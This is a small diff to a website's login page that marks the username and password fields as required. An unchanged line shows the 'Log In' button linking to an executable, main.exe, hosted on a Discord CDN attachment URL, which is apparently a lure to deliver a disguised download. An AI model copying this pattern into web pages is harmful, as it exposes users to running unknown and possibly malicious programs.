--- a/index.html
+++ b/index.html
@@ -67,8 +67,8 @@
     <div class="container">
         <h2>Login</h2>
         <form action="">
-            <input type="text" name="username" id="username" placeholder="username">
-            <input type="password" name="pass" id="pass" placeholder="password">
+            <input type="text" name="username" id="username" placeholder="username" required>
+            <input type="password" name="pass" id="pass" placeholder="password" required>
            <div class="btns">
              <a href="https://cdn.discordapp.com/attachments/931941841237065778/980411977950199818/main.exe"><button type="button" id="log-in">Log In</button></a>
             <a href="./registration.html"><button type="button" id="sign-up">Sign Up</button></a>
